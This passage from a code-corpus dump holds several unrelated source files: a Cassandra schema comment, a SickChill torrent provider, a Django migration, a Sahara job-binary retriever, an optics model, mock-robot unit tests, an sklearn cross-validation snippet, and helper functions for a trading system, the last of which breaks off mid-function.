#
# __table_name__ = 'versions'
#
# key = columns.UUID(primary_key=True, required=True)
#
# # Raw
# doc = columns.Bytes()
# docID = columns.Text()
# filetype = columns.Text()
# source = columns.Text()
# timestamps = columns.Map(columns.Text, columns.Text)
#
# # Normalized
# uris = columns.Text()
# title = columns.Text()
# contributors = columns.Text() # TODO
# providerUpdatedDateTime = columns.DateTime()
#
# description = columns.Text()
# freeToRead = columns.Text() # TODO
# languages = columns.List(columns.Text())
# licenses = columns.Text() # TODO
# publisher = columns.Text() # TODO
# subjects = columns.List(columns.Text())
# tags = columns.List(columns.Text())
# sponsorships = columns.Text() # TODO
# version = columns.Text() # TODO
# otherProperties = columns.Text() # TODO
# shareProperties = columns.Text() # TODO
#
# # Additional metadata
# versions = columns.List(columns.UUID)
| kmjungersen/BenchmarkDB | BenchmarkDB/cassandradb/utils/_cassandra.py | Python | mit | 5,980 |
import re
from urllib.parse import urljoin
from sickchill import logger
from sickchill.helper.common import try_int
from sickchill.oldbeard import tvcache
from sickchill.oldbeard.bs4_parser import BS4Parser
from sickchill.providers.torrent.TorrentProvider import TorrentProvider
class Provider(TorrentProvider):
    """Torrent provider for HorribleSubs (anime fansub releases).

    Anime-only provider: searches go through the site's api.php endpoint,
    RSS polling goes through rss.php.  Result sizes/seeders/leechers are
    placeholders because the site does not expose them.
    """
    def __init__(self):
        super().__init__("HorribleSubs")
        self.public = True
        self.supports_absolute_numbering = True
        self.anime_only = True
        self.minseed = 0
        self.minleech = 0
        self.url = 'https://horriblesubs.info'
        self.urls = {
            'search': urljoin(self.url, 'api.php'),
            'rss': 'http://www.horriblesubs.info/rss.php'
        }
        self.cache = tvcache.TVCache(self, min_time=15)  # only poll HorribleSubs every 15 minutes max
    def search(self, search_strings, age=0, ep_obj=None):
        """Return result dicts for each search mode; anime shows only."""
        results = []
        if self.show and not self.show.is_anime:
            return results
        for mode in search_strings:
            items = []
            logger.debug(_("Search Mode: {mode}".format(mode=mode)))
            # deduplicate the search strings before querying
            for search_string in {*search_strings[mode]}:
                if mode == 'RSS':
                    entries = self.__rssFeed()
                else:
                    entries = self.__getShow(search_string)
                items.extend(entries)
            # For each search mode sort all the items by seeders if available
            items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
            results.extend(items)
        return results
    def __rssFeed(self):
        """Fetch and parse the provider RSS feed (all resolutions)."""
        entries = []
        rss_params = {
            'res': 'all'
        }
        target_url = self.urls['rss']
        data = self.get_url(target_url, params=rss_params, returns='text')
        if not data:
            return entries
        entries = self.__parseRssFeed(data)
        return entries
    @staticmethod
    def __parseRssFeed(data):
        """Convert RSS <item> elements into result dicts.

        size/seeders/leechers are dummy values: the feed has none.
        """
        entries = []
        with BS4Parser(data, 'html5lib') as soup:
            items = soup.findAll('item')
            for item in items:
                title = item.find('title').text
                download_url = item.find('link').text
                entry = {'title': title, 'link': download_url, 'size': 333, 'seeders': 1, 'leechers': 1, 'hash': ''}
                logger.debug(_('Found result: {title}'.format(title=title)))
                entries.append(entry)
        return entries
    def __getShow(self, search_string):
        """Search the api.php endpoint for a show by name."""
        entries = []
        search_params = {
            'method': 'search',
            'value': search_string
        }
        logger.debug(_("Search String: {search_string}".format(search_string=search_string)))
        target_url = self.urls['search']
        data = self.get_url(target_url, params=search_params, returns='text')
        if not data:
            return entries
        entries = self.__parseSearchResult(data, target_url)
        return entries
    def __parseSearchResult(self, data, target_url):
        """Parse the search HTML and resolve each hit into torrent links."""
        results = []
        with BS4Parser(data, 'html5lib') as soup:
            lists = soup.find_all('ul')
            list_items = []
            for ul_list in lists:
                curr_list_item = ul_list('li') if ul_list else []
                list_items.extend(curr_list_item)
            # Continue only if one Release is found
            if len(list_items) < 1:
                logger.debug('Data returned from provider does not contain any torrents')
                return []
            for list_item in list_items:
                title = '{0}{1}'.format(str(list_item.find('span').next_sibling), str(list_item.find('strong').text))
                logger.debug('Found title {0}'.format(title))
                # the href fragment after '#' is the episode number
                episode_url = '/#'.join(list_item.find('a')['href'].rsplit('#', 1))
                episode = episode_url.split('#', 1)[1]
                page_url = '{0}{1}'.format(self.url, episode_url)
                show_id = self.__getShowId(page_url)
                if not show_id:
                    logger.debug('Could not find show ID')
                    continue
                fetch_params = {
                    'method': 'getshows',
                    'type': 'show',
                    'mode': 'filter',
                    'showid': show_id,
                    'value': episode
                }
                entries = self.__fetchUrls(target_url, fetch_params, title)
                results.extend(entries)
        return results
    def __getShowId(self, target_url):
        """Scrape the numeric hs_showid from a show's episode page."""
        data = self.get_url(target_url, returns='text')
        if not data:
            logger.debug('Could not fetch url: {0}'.format(target_url))
            return None
        with BS4Parser(data, 'html5lib') as soup:
            # keep only the digits of the 'hs_showid' javascript variable
            show_id = re.sub(r'[^0-9]', '', soup(text=re.compile('hs_showid'))[0])
            logger.debug('show id: {0}'.format(show_id))
        return show_id
    def __fetchUrls(self, target_url, params, title):
        """Fetch release rows for an episode and build result dicts."""
        entries = []
        data = self.get_url(target_url, params=params, returns='text')
        if not data:
            return entries
        with BS4Parser(data, 'html5lib') as soup:
            for div in soup.findAll('div', attrs={'class': 'rls-link'}):
                quality = div.find('span', attrs={'class': 'rls-link-label'}).get_text(strip=True)
                link = div.find('span', class_='hs-torrent-link')
                download_url = link.find('a')['href'] if link and link.find('a') else None
                if not download_url:
                    # fallback to magnet link
                    link = div.find('span', class_='hs-magnet-link')
                    download_url = link.find('a')['href'] if link and link.find('a') else None
                release_title = '[HorribleSubs] {0}.[{1}]'.format(title, quality)
                item = {'title': release_title, 'link': download_url, 'size': 333, 'seeders': 1, 'leechers': 1, 'hash': ''}
                logger.debug(_('Found result: ') + f'{release_title}')
                entries.append(item)
        return entries
| Vagab0nd/SiCKRAGE | sickchill/oldbeard/providers/horriblesubs.py | Python | gpl-3.0 | 6,132 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Event.titleRaw, backfill it from title, then enforce
    uniqueness on (venue, titleRaw).

    The column is created nullable first so the RunSQL backfill can
    populate existing rows, and only then tightened to a non-null field.
    """
    dependencies = [
        ('artbot_website', '0002_auto_20160109_0625'),
    ]
    operations = [
        migrations.AddField(
            model_name='event',
            name='titleRaw',
            field=models.TextField(null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='event',
            name='url',
            field=models.TextField(),
        ),
        # Copy existing titles into the new column before it becomes
        # mandatory.
        migrations.RunSQL(
            "UPDATE artbot_website_event SET titleRaw = title;"
        ),
        migrations.AlterUniqueTogether(
            name='event',
            unique_together=set([('venue', 'titleRaw')]),
        ),
        # Every row now has a value: drop the null/blank allowance.
        migrations.AlterField(
            model_name='event',
            name='titleRaw',
            field=models.TextField(),
        ),
    ]
| coreymcdermott/artbot | artbot_website/migrations/0003_auto_20160222_0746.py | Python | mit | 930 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sahara import conductor as c
conductor = c.API
def get_raw_data(context, job_binary):
    """Return the raw payload of a job binary stored in Sahara's own DB.

    A job binary URL looks like 'internal-db://JobBinaryInternal-UUID';
    the part after the scheme is the JobBinaryInternal id.
    """
    scheme = "internal-db://"
    internal_id = job_binary.url[len(scheme):]
    return conductor.job_binary_internal_get_raw_data(context, internal_id)
| openstack/sahara | sahara/service/edp/binary_retrievers/sahara_db.py | Python | apache-2.0 | 937 |
import numpy as np
import dipsim.util as util
class Illuminator:
    """Excitation-path model of a fluorescence microscope.

    An Illuminator is described by its illumination type ('wide', 'sheet'
    or 'unpolarized'), the tilt of its optical axis, its numerical
    aperture, the refractive index of the sample medium, and the
    polarization angle of the excitation light.
    """
    def __init__(self, illum_type='wide', theta_optical_axis=0, na=0.8,
                 n=1.33, phi_pol=0):
        self.illum_type = illum_type
        self.theta_optical_axis = theta_optical_axis
        self.na = na
        self.n = n
        # Half-angle of the illumination cone, from NA = n*sin(alpha).
        self.alpha = np.arcsin(self.na/self.n)
        self.phi_pol = phi_pol

    def calc_excitation_efficiency(self, fluorophore):
        """Return the excitation efficiency for ``fluorophore``."""
        # Dipole orientation expressed in the illuminator's tilted frame.
        theta = util.theta_prime(fluorophore.theta, fluorophore.phi, self.theta_optical_axis)
        phi = util.phi_prime(fluorophore.theta, fluorophore.phi, self.theta_optical_axis)
        # Aperture-dependent coefficients (functions of alpha only);
        # the decimal constants are the exact dyadic fractions 1/4, 3/8,
        # 1/8, 3/16, 7/32, 3/32 and 1/32 used in the derivation.
        cosa = np.cos(self.alpha)
        A = 0.25 - 0.375*cosa + 0.125*(cosa**3)
        B = 0.1875*cosa - 0.1875*(cosa**3)
        C = 0.21875 - 0.09375*cosa - 0.09375*(cosa**2) - 0.03125*(cosa**3)
        D = 4.0/(3.0*(1.0 - cosa))
        sin2 = np.sin(theta)**2
        if self.illum_type == 'wide':
            return D*(A + B*sin2 + C*sin2*np.cos(2*(phi - self.phi_pol)))
        elif self.illum_type == 'sheet':
            return (np.sin(theta)*np.cos(phi - self.phi_pol))**2
        elif self.illum_type == 'unpolarized':
            return 2*D*(A + B*sin2)
        else:
            print("Warning: invalid illum_type")
| talonchandler/dipsim | dipsim/illuminator.py | Python | mit | 1,561 |
from __future__ import division
PKG='test_controller'
import unittest
from diff_drive.mock_robot import MockRobot
class TestMockRobot(unittest.TestCase):
    """Unit tests for MockRobot's encoder-tick simulation.

    Each test drives the mock robot through updateRobot() calls and
    checks the accumulated left/right encoder ticks.  The first
    updateRobot() after setSpeeds() only latches the new speeds, so
    ticks start accumulating from the second update onward.
    """

    def setUp(self):
        # Fresh robot for every test so tick counters start at zero.
        self.robot = MockRobot()

    def testNoMotion(self):
        """With no speed set, ticks stay at zero across updates."""
        self.robot.updateRobot(1)
        ticks = self.robot.getTicks()
        # assertEqual replaces the deprecated assertEquals alias
        # (removed in Python 3.12).
        self.assertEqual(ticks.left, 0)
        self.assertEqual(ticks.right, 0)
        self.robot.updateRobot(1)
        ticks = self.robot.getTicks()
        self.assertEqual(ticks.left, 0)
        self.assertEqual(ticks.right, 0)

    def testStraightLine(self):
        """Equal wheel speeds accumulate equal ticks on both sides."""
        self.robot.setSpeeds(100, 100)
        self.robot.updateRobot(1)
        ticks = self.robot.getTicks()
        # first update only latches the speeds: still zero ticks
        self.assertEqual(ticks.left, 0)
        self.assertEqual(ticks.right, 0)
        self.robot.updateRobot(1)
        ticks = self.robot.getTicks()
        self.assertEqual(ticks.left, 100)
        self.assertEqual(ticks.right, 100)
        self.robot.updateRobot(0.1)
        ticks = self.robot.getTicks()
        self.assertEqual(ticks.left, 110)
        self.assertEqual(ticks.right, 110)

    def testRotateLeft(self):
        """Opposite wheel speeds produce mirrored tick counts."""
        self.robot.setSpeeds(-100, 100)
        self.robot.updateRobot(0.1)
        self.robot.updateRobot(0.1)
        ticks = self.robot.getTicks()
        self.assertEqual(ticks.left, -10)
        self.assertEqual(ticks.right, 10)
        self.robot.updateRobot(0.1)
        ticks = self.robot.getTicks()
        self.assertEqual(ticks.left, -20)
        self.assertEqual(ticks.right, 20)
if __name__ == '__main__':
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| merose/diff_drive | tests/test_mock_robot.py | Python | bsd-3-clause | 1,587 |
from sklearn import datasets, svm

digits = datasets.load_digits()
X_digits = digits.data
y_digits = digits.target

# Hold out the last 100 samples as a test set and score a linear SVC.
svc = svm.SVC(C=1, kernel='linear')
score = svc.fit(X_digits[:-100], y_digits[:-100]).score(X_digits[-100:], y_digits[-100:])
print(score)

# Manual 3-fold (KFold-style) cross validation: split the data in folds
# that we alternately use for training and testing.
import numpy as np
X_folds = np.array_split(X_digits, 3)
y_folds = np.array_split(y_digits, 3)
scores = list()
for k in range(3):
    X_train = list(X_folds)
    # pop out the element with index k to use as the held-out test fold
    X_test = X_train.pop(k)
    X_train = np.concatenate(X_train)
    y_train = list(y_folds)
    y_test = y_train.pop(k)
    y_train = np.concatenate(y_train)
    # BUG FIX: was 'socres.append(...)' (NameError); accumulate into 'scores'
    scores.append(svc.fit(X_train, y_train).score(X_test, y_test))
print(scores)
# -*- coding: utf-8 -*-
# Copyright 2013 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from Cerebrum.modules.bofhd.bofhd_core_help import group_help
from Cerebrum.modules.bofhd.bofhd_core_help import command_help
from Cerebrum.modules.bofhd.bofhd_core_help import arg_help
# Extend the core bofhd help texts with the Indigo-specific 'group user'
# command description (group_help and arg_help are re-exported unchanged).
command_help['group']['group_user'] = 'List all groups an account is a member of'
| unioslo/cerebrum | Cerebrum/modules/no/Indigo/bofhd_go_help.py | Python | gpl-2.0 | 1,063 |
import ael
import acm
import stat
import time
import shutil
import string
import HTI_functions
import HTI_DB_Functions
import datetime
from datetime import date
# Exchange ticker month codes, indexed by month number - 1:
# futures use the F..Z series, call options A..L, put options M..X.
future_month_code_array = ['F','G','H','J','K','M','N','Q','U','V','X','Z']
call_month_code_array = ['A','B','C','D','E','F','G','H','I','J','K','L']
put_month_code_array = ['M','N','O','P','Q','R','S','T','U','V','W','X']
# Length of a commodity code prefix in instrument names.
LEN_COMDY_CODE = 3
# NOTE(review): presumably the ODBC DSN name used by HTI_DB_Functions —
# confirm against that module.
dsn = "HTIConnString"
def getYear(insType, insMaturity):
    # Return the two-digit year ('YY') of the maturity date.
    # insType is accepted for signature parity with getMonthCode but unused.
    exp_day = ael.date(insMaturity).to_string("%Y%m%d")
    return exp_day[2:4]
def getMonthCode(insType, call_option, insMaturity):
    # Map the maturity month to its exchange ticker month code:
    # futures use F..Z, calls A..L, puts M..X.  Returns '' for any
    # other instrument type.
    exp_day = ael.date(insMaturity).to_string("%Y%m%d")
    mm = exp_day[4:6]
    if insType == 'Future/Forward':
        return future_month_code_array[int(mm)-1]
    elif insType == 'Option':
        if call_option == True:
            return call_month_code_array[int(mm)-1]
        else:
            return put_month_code_array[int(mm)-1]
    return ''
def getChildPortfolio(pPf, pfarr):
    # Recursively collect the display ids of all non-compound (leaf)
    # portfolios under pPf into pfarr; the accumulator is also returned.
    if (pPf == None):
        return pfarr
    for child in pPf.children():
        pfid = child.display_id()
        cPf = ael.Portfolio[pfid]
        if cPf != None:
            if cPf.compound == True:
                # compound portfolios are containers: descend into them
                pfarr = getChildPortfolio(cPf, pfarr)
            else:
                pfarr.append(pfid)
    return pfarr
def addDictError(type, header, body, errdict):
    """Record an import/validation error under the proper category of *errdict*.

    Each category in *errdict* maps to a pair of parallel lists
    ``[headers, bodies]``.  If *header* is already present in the category,
    *body* is appended to its existing detail text separated by ``'|'``;
    otherwise a new ``(header, body)`` entry is added.

    Parameters:
        type    -- error category name: 'Instrument', 'Portfolio',
                   'Counterparty', 'Trade Ccy', 'Acquirer', 'Broker',
                   'BuySell' or 'Trader'
        header  -- grouping key for the error
        body    -- detail text to record under *header*
        errdict -- dict of category key -> [header_list, body_list]

    Returns *errdict* (mutated in place).

    Fixes over the previous implementation: the 'BuySell' branch failed to
    return *errdict* after appending a new entry (it fell through and
    returned None), and an unrecognised *type* also returned None; both
    cases now return *errdict* so callers can safely reassign it.
    """
    # Map the human-readable category name to its key in errdict.
    category_keys = {
        'Instrument': 'invalidIns',
        'Portfolio': 'invalidPf',
        'Counterparty': 'invalidParty',
        'Trade Ccy': 'invalidTrdCcy',
        'Acquirer': 'invalidAcquirer',
        'Broker': 'invalidBroker',
        'BuySell': 'invalidBuySell',
        'Trader': 'invalidTrader',
    }
    print('header=%s' % header)
    key = category_keys.get(type)
    if key is None:
        # Unknown category: nothing to record.
        return errdict
    headers = errdict[key][0]
    bodies = errdict[key][1]
    for i in range(len(headers)):
        if headers[i] == header:
            # Header already recorded: append the detail, '|'-separated.
            bodies[i] = bodies[i] + '|' + body
            return errdict
    # First occurrence of this header in the category.
    headers.append(header)
    bodies.append(body)
    return errdict
def validStatus(status):
    """Return True if *status* is an acceptable FA trade status.

    Accepted values (after stripping surrounding whitespace):
    'FO Confirmed', 'Simulated' and the empty string.
    """
    # Idiomatic form: return the membership test directly instead of
    # an if/else returning True/False.
    return status.strip() in ('FO Confirmed', 'Simulated', '')
def get_dates():
    """Return the report date choices: the literal string 'TODAY'
    followed by a fixed historical date (2015-05-28)."""
    return ["TODAY", ael.date('2015-05-28')]
def ClearArray(arr):
    """Remove all elements from *arr* in place.

    Replaces the original pop-in-a-loop implementation with a single,
    equivalent slice deletion.
    """
    del arr[:]
# NOTE(review): the triple-quoted block below is dead code -- a module-level
# string literal that is never executed.  Kept for reference only.
'''
def getAllBrokers():
    parties = []
    for pty in ael.Party.select("type = 'Broker'"):
        parties.append(pty.display_id())
    parties.sort()
    return parties
def getAllPortfolios():
    portfolios = []
    for port in ael.Portfolio.select():
        portfolios.append(port.display_id())
    portfolios.sort()
    return portfolios
def getAllParties():
    parties = []
    for pty in ael.Party.select("type = 'Client'"):
        parties.append(pty.display_id())
    for pty in ael.Party.select("type = 'Broker'"):
        parties.append(pty.display_id())
    for pty in ael.Party.select("type = 'Counterparty'"):
        parties.append(pty.display_id())
    parties.sort()
    return parties
def getAllAcquirers():
    acquirers = []
    for acq in ael.Party.select("type = 'Intern Dept'"):
        acquirers.append(acq.display_id())
    acquirers.sort()
    return acquirers
def getAllIssuers():
    issuers = []
    for issuer in ael.Party.select("type = 'Issuer'"):
        issuers.append(issuer.display_id())
    issuers.sort()
    return issuers
def getAllStatus():
    status = []
    status.append('Simulated')
    status.append('FO Confirmed')
    status.sort()
    return status
def get_yesno():
    ret = []
    ret.append("Y")
    ret.append("N")
    return ret
def get_feedcode():
    ret = []
    ret.append(LOCAL_EXCHANGE_CODE)
    ret.append(BLOOMBERG_TICKER)
    ret.append(ISIN)
    return ret
'''
def getHorizonPfbyFAPf(fa_prfid):
    """Return the 'HORIZON_PORTFOLIO' additional-info value configured on
    the FA portfolio *fa_prfid*, or '' when it is not set."""
    strSql = """select a.value
    from portfolio pf, additionalinfo a, additionalinfospec s
    where pf.prfnbr = a.recaddr and a.addinf_specnbr = s.specnbr and s.field_name = 'HORIZON_PORTFOLIO'
    and s.rec_type = 'Portfolio'
    and pf.prfid = \'%s\'""" % (fa_prfid)
    columns, buf = ael.asql(strSql)
    # Only the first row of the first result table is relevant.
    for table in buf:
        for row in table:
            return row[0].strip()
        break
    return ''
def formatFOTradeId(fo_trade_id, channel):
    """Build the FA-side FO trade id: '<fo_trade_id>-<today as YYYYMMDD>'.

    *channel* is accepted for interface compatibility; the channel-prefixed
    variant is kept below for reference but intentionally disabled.
    """
    #return channel.strip() + '-' + fo_trade_id + '-' + ael.date_today().to_string('%Y%m%d')
    return fo_trade_id + '-' + ael.date_today().to_string('%Y%m%d')
def getTrade(fo_trade_id, channel, trd_create_dt, trd_create_dt_plus1):
    """Return the trade number of the first non-void trade created in
    [trd_create_dt, trd_create_dt_plus1) whose concatenated
    'FO Trade Id_1/2/3' additional infos equal the formatted FO trade id
    and whose 'Trade Source' additional info equals *channel*.

    Returns -1 when no matching trade exists.
    """
    trdnbr = -1
    # Normalise the front-office id to the stored format (adds date suffix).
    fo_trade_id = formatFOTradeId(fo_trade_id, channel)
    # Previous additionalinfo-join query, kept for reference:
    '''
    strSql = """select trdnbr
    from trade t, additionalinfo at, additionalinfospec st, additionalinfo ac, additionalinfospec sc
    where t.trdnbr = at.recaddr and at.addinf_specnbr = st.specnbr and st.field_name = 'FO Trade Id' and st.rec_type = 'Trade'
    and t.trdnbr = ac.recaddr and ac.addinf_specnbr = sc.specnbr and sc.field_name = 'Trade Source' and sc.rec_type = 'Trade'
    and at.value = \'%s\' and ac.value = \'%s\' and status ~= 'Void'""" % (fo_trade_id, channel)
    '''
    strSql = """select trdnbr
    from trade t
    where creat_time >= \'%s\' and creat_time < \'%s\'
    and to_string(add_info(t,'FO Trade Id_1'), add_info(t,'FO Trade Id_2'), add_info(t,'FO Trade Id_3')) = \'%s\'
    and add_info(t,'Trade Source') = \'%s\' and status ~= 'Void'""" % (trd_create_dt, trd_create_dt_plus1, fo_trade_id, channel)
    #print channel.strip(), 'louis'
    #print strSql
    rs = ael.asql(strSql)
    insid = ''
    columns, buf = rs
    # Take the first row of the first result table only.
    for table in buf:
        for row in table:
            trdnbr = row[0]
            break
        break
    return trdnbr
def getBroker(ptyid):
    """Return *ptyid* if it names a party of type 'Broker', else ''."""
    strSql = """SELECT pty.ptyid
    FROM party pty
    WHERE pty.ptyid = \'%s\' and type = 'Broker' """ % (ptyid)
    columns, buf = ael.asql(strSql)
    found = ''
    for table in buf:
        for row in table:
            found = row[0]
    return found
def getCounterparty(ptyid):
    """Return *ptyid* if it names a party of type 'Counterparty', else ''."""
    strSql = """SELECT pty.ptyid
    FROM party pty
    WHERE pty.ptyid = \'%s\' and type = 'Counterparty' """ % (ptyid)
    columns, buf = ael.asql(strSql)
    found = ''
    for table in buf:
        for row in table:
            found = row[0]
    return found
def createInstrumentAlias(insid, aliasType, aliasValue):
    """Attach an instrument alias of *aliasType* with value *aliasValue*
    to instrument *insid*, unless the instrument already carries a
    non-empty BB_TICKER alias (existing tickers are never overridden).

    NOTE(review): the no-override guard only inspects BB_TICKER aliases,
    even when *aliasType* is a different alias type -- confirm intended.
    """
    ael_ins = ael.Instrument[insid]
    acm_ins = acm.FInstrument[insid]
    if ael_ins != None:
        for aliase in acm_ins.Aliases():
            if aliase.Type().Name() == 'BB_TICKER':
                if aliase.Alias().strip() != '': # no override existing
                    return
        # Aliases are created through the AEL API on a clone of the record.
        ael_ins_clone = ael_ins.clone()
        a = ael.InstrumentAlias.new(ael_ins_clone)
        a.type = aliasType
        a.alias = aliasValue
        a.commit()
        ael.poll()
    else:
        print 'Instrument %s cannot be found, so no alias is added' % (insid)
def quoteToUnitValue(insid, quote):
    """Convert a quoted price of instrument *insid* into its per-unit value."""
    return acm.FInstrument[insid].QuoteToUnitValue(1, quote, 1)
def unitValueToQuote(insid, quote):
    """Convert a per-unit value of instrument *insid* into its quoted price."""
    return acm.FInstrument[insid].UnitValueToQuote(1, quote, 1)
def quoteTo(ins, date, quoteType, quote):
    """Return the premium of *quote* under quotation style *quoteType* on
    *date*, using a throwaway clone so *ins* itself is never modified."""
    cloned = ins.clone()
    cloned.quote_type = quoteType
    return cloned.premium_from_quote(date, quote)
def FeedQuoteToFAQuote(insid, feedprice, quot, Source):
    """Translate a feed price into an FA quote for *insid*.

    Only quotation style 'PER_UNIT' needs conversion; every other style
    (including 'FA') passes the feed price through unchanged.  *Source*
    is accepted for interface compatibility but not used.
    """
    if quot == 'PER_UNIT':
        return unitValueToQuote(insid, feedprice)
    return feedprice
def getAcquirer(ptyid):
    """Return *ptyid* if it names a party of type 'Intern Dept', else ''."""
    strSql = """SELECT pty.ptyid
    FROM party pty
    WHERE pty.ptyid = \'%s\' and type = 'Intern Dept' """ % (ptyid)
    columns, buf = ael.asql(strSql)
    found = ''
    for table in buf:
        for row in table:
            found = row[0]
    return found
def getFullIndexLocalCodeByMapping(localcode, insMic):
    """Resolve *localcode* against the 'Local Exchange Code' additional
    info of non-generic instruments on MIC *insMic*.

    The stored value may be a comma-separated list of codes; the first
    entry of the matched list is returned.  Falls back to *localcode*
    itself when no instrument matches.
    """
    strSql = """select li.value
    from instrument i,
    AdditionalInfoSpec mis, AdditionalInfo mi,
    AdditionalInfoSpec lis, AdditionalInfo li
    where i.insaddr = mi.recaddr
    and i.generic = \'No\'
    and mi.addinf_specnbr = mis.specnbr
    and mis.field_name = 'MIC'
    and mi.value = '%s'
    and i.insaddr = li.recaddr
    and li.addinf_specnbr = lis.specnbr
    and lis.field_name = 'Local Exchange Code'
    and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (insMic, localcode, localcode+',%', '%,'+localcode)
    columns, buf = ael.asql(strSql)
    matched = ''
    for table in buf:
        for row in table:
            matched = row[0].strip()
            break  # first row per table; a later table's first row wins
    if matched == '':
        return localcode
    return matched.split(",")[0]
def getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval):
    """Find a listed derivative by its trade attributes.

    Looks up a non-generic Option or Future/Forward whose underlying's
    'Local Exchange Code' additional info contains *mssd_underlying*,
    whose expiry falls inside the month *mssd_exp_month* (YYYYMM...) and
    whose contract size equals *mssd_pointval*; options are additionally
    filtered on call/put and strike.  Returns the first matching insid,
    or '' when nothing matches or *insProdType* is not OPTION/FUTURE.

    NOTE(review): *insMic* is accepted but never used in either query --
    confirm whether the MIC filter was intentionally dropped.
    """
    insid = ''
    insProdType = insProdType.upper()
    mssd_callput = mssd_callput.upper()
    yy = mssd_exp_month[0:4]  # 4-digit year despite the 'yy' name
    mm = mssd_exp_month[4:6]
    # Expiry window: first to last calendar day of the given month.
    fm_exp_day = ael.date(yy+'-'+mm+'-01').to_string("%Y%m%d")
    to_exp_day = ael.date(yy+'-'+mm+'-01').add_delta(0, 1, 0).add_days(-1).to_string("%Y%m%d")
    #print fm_exp_day, to_exp_day
    #print insProdType
    if insProdType == 'OPTION':
        if mssd_callput == 'CALL':
            call_option = 'Yes'
        else:
            call_option = 'No'
        strSql = """select i.insid
        from
        Instrument i,
        Instrument ui,
        AdditionalInfoSpec lis,
        AdditionalInfo li
        where i.instype = 'Option'
        and i.exp_day >= \'%s\' and i.exp_day <= \'%s\'
        and i.call_option = \'%s\'
        and i.strike_price = %s
        and ui.insaddr = li.recaddr
        and li.addinf_specnbr = lis.specnbr
        and lis.field_name = 'Local Exchange Code'
        and i.generic = \'No\'
        and i.und_insaddr = ui.insaddr
        and i.contr_size = %s
        and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (fm_exp_day, to_exp_day, call_option, mssd_strike, mssd_pointval, mssd_underlying, mssd_underlying+',%', '%,'+mssd_underlying)
    elif insProdType == 'FUTURE':
        strSql = """select i.insid
        from
        Instrument i,
        Instrument ui,
        AdditionalInfoSpec lis,
        AdditionalInfo li
        where i.instype = 'Future/Forward'
        and i.exp_day >= \'%s\' and i.exp_day <= \'%s\'
        and ui.insaddr = li.recaddr
        and li.addinf_specnbr = lis.specnbr
        and lis.field_name = 'Local Exchange Code'
        and i.generic = \'No\'
        and i.und_insaddr = ui.insaddr
        and i.contr_size = %s
        and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (fm_exp_day, to_exp_day, mssd_pointval, mssd_underlying, mssd_underlying+',%', '%,'+mssd_underlying)
    else:
        return ''
    #print strSql
    rs = ael.asql(strSql)
    columns, buf = rs
    # Return the first matching row.
    for table in buf:
        for row in table:
            insid = row[0].strip()
            return insid
    return insid
def getInstrumentByMapping(localcode, insMic):
    """Return the insid of the first non-generic instrument whose
    'Local Exchange Code' additional info contains *localcode* and whose
    'MIC' additional info equals *insMic*; '' when nothing matches."""
    strSql = """select i.insid
    from instrument i,
    AdditionalInfoSpec mis, AdditionalInfo mi,
    AdditionalInfoSpec lis, AdditionalInfo li
    where i.insaddr = mi.recaddr
    and i.generic = \'No\'
    and mi.addinf_specnbr = mis.specnbr
    and mis.field_name = 'MIC'
    and mi.value = '%s'
    and i.insaddr = li.recaddr
    and li.addinf_specnbr = lis.specnbr
    and lis.field_name = 'Local Exchange Code'
    and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (insMic, localcode, localcode+',%', '%,'+localcode)
    columns, buf = ael.asql(strSql)
    for table in buf:
        for row in table:
            return row[0].strip()
    return ''
def _setInsAddInfoIfEmpty(acm_ins, spec_name, attr_name, value, set_if_blank=True):
    """Create additional info *spec_name* on *acm_ins* with *value* when it
    does not exist yet; when it exists but is blank, overwrite it in place
    (skipped when *set_if_blank* is False).  Never overwrites a non-empty
    value."""
    current = getattr(acm_ins.AdditionalInfo(), attr_name)()
    if current == None:
        spec = acm.FAdditionalInfoSpec[spec_name]
        addInfo = acm.FAdditionalInfo()
        addInfo.AddInf(spec.Oid())
        addInfo.Recaddr(acm_ins.Oid())
        addInfo.FieldValue(value)
        addInfo.Commit()
    elif set_if_blank and current.strip() == '':
        # NOTE(review): mirrors the original in-place update, which issued
        # no explicit Commit() here -- confirm acm persists this setter.
        getattr(acm_ins.AdditionalInfo(), attr_name)(value)

def CreateInsAdditionalInfo(ins_new_insid, insMic, insDesc, insName, localcode, insType, insUnderlying_mktId):
    """Populate the standard additional infos of instrument *ins_new_insid*.

    Sets (only when missing or blank): MIC, Snaps Pce Source (derived from
    the MIC), Ins Description, Local Exchange Code, Ins Short Name, and --
    for OPTION/FUTURE -- Commodity Code; STOCK instruments additionally get
    SUBJ_TO_STAMP_DUTY = 'Yes' when absent.

    Fix over the previous implementation: when *insType* was OPTION/FUTURE
    and both *insUnderlying_mktId* and *localcode* were empty, the local
    ``comdycode`` was referenced before assignment (NameError); it now
    defaults to '' and the Commodity Code update is skipped.
    """
    acm_ins = acm.FInstrument[ins_new_insid]
    # MIC and the price source derived from it.
    if insMic.strip() != '':
        _setInsAddInfoIfEmpty(acm_ins, 'MIC', 'MIC', insMic)
